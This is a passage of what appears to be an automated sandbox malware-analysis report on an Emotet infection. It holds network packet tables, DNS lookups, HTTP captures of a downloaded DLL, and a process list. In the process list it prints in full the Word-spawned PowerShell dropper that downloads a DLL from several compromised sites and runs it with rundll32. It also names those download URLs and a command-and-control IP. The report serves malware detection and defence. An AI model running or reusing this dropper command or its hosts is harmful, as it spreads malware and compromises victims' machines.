                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998317957 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998375893 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998409033 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998429060 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998480082 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998481989 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998531103 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998694897 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998759031 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998814106 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998864889 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998881102 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998919964 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998969078 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.999028921 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.999269962 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.999324083 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.999375105 CET804975350.62.141.15192.168.2.5

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.435177088 CET6217653192.168.2.58.8.8.8
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.455148935 CET53621768.8.8.8192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.124186993 CET5959653192.168.2.58.8.8.8
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.143806934 CET53595968.8.8.8192.168.2.5

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.435177088 CET192.168.2.58.8.8.80xfeffStandard query (0)thepilatesstudionj.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.124186993 CET192.168.2.58.8.8.80x45b0Standard query (0)alfaofarms.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.455148935 CET8.8.8.8192.168.2.50xfeffNo error (0)thepilatesstudionj.com72.167.40.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.143806934 CET8.8.8.8192.168.2.50x45b0No error (0)alfaofarms.com50.62.141.15A (IP address)IN (0x0001)

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  • thepilatesstudionj.com
                                                                                                                                                                                                                  • alfaofarms.com

                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.54979451.178.61.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  1192.168.2.54975272.167.40.8380C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.759536028 CET1051OUTGET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                                                                  Host: thepilatesstudionj.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.974144936 CET1051INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                  Date: Mon, 22 Nov 2021 10:01:44 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  2192.168.2.54975350.62.141.1580C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.313236952 CET1052OUTGET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                                                                  Host: alfaofarms.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488010883 CET1054INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 22 Nov 2021 10:01:48 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  X-Powered-By: PHP/7.4.24
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Expires: Mon, 22 Nov 2021 10:01:48 GMT
                                                                                                                                                                                                                  Content-Disposition: attachment; filename="SfN3LqRRI1423e.dll"
                                                                                                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                                                                                                  Set-Cookie: 619b6a8c643b1=1637575308; expires=Mon, 22-Nov-2021 10:02:48 GMT; Max-Age=60; path=/
                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                  Connection: Upgrade, Keep-Alive
                                                                                                                                                                                                                  Last-Modified: Mon, 22 Nov 2021 10:01:48 GMT
                                                                                                                                                                                                                  Keep-Alive: timeout=5
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                  Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 08 4c 96 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 10 00 94 03 00 00 de 03 00 00 00 00 00 26 58 01 00 00 10 00 00 00 b0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 07 00 00 04 00 00 86 15 08 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 d7 04 00 c0 05 00 00 d0 dc 04 00 b4 00 00 00 00 20 05 00 10 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 07 00 a0 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 98 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 93 03 00 00 10 00 00 00 94 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 3c 01 00 00 b0 03 00 00 3e 01 00 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 25 00 00 00 f0 04 00 00 18 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 44 02 00 00 20 05 00 00 46 02 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 33 00 00 00 70 07 00 00 34 00 00 00 34 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELLa!&X@ Dp3@.text `.rdata<>@@.data,%@.rsrcD F@@.reloc3p44@B


                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.54979451.178.61.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-11-22 10:03:15 UTC0OUTGET /xlgRAUoKyrAaNnNNtTN HTTP/1.1
                                                                                                                                                                                                                  Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=
                                                                                                                                                                                                                  Host: 51.178.61.60
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                  2021-11-22 10:03:15 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 22 Nov 2021 10:03:15 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 162
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-11-22 10:03:15 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:11
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                                                                                  File size:1937688 bytes
                                                                                                                                                                                                                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:17
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
                                                                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:17
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:17
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:18
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
                                                                                                                                                                                                                  Imagebase:0xc20000
                                                                                                                                                                                                                  File size:430592 bytes
                                                                                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:27
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:29
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:30
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:31
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                                  Imagebase:0x7ff715d40000
                                                                                                                                                                                                                  File size:163336 bytes
                                                                                                                                                                                                                  MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:31
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:01:51
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
                                                                                                                                                                                                                  Imagebase:0xe00000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:12
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
                                                                                                                                                                                                                  Imagebase:0xe00000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:29
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
                                                                                                                                                                                                                  Imagebase:0xe00000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, Author: Joe Security

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:32
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                                  Imagebase:0x7ff7ae4c0000
                                                                                                                                                                                                                  File size:455656 bytes
                                                                                                                                                                                                                  MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:33
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:39
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:48
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
                                                                                                                                                                                                                  Imagebase:0xe00000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, Author: Joe Security

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:49
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:02:59
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
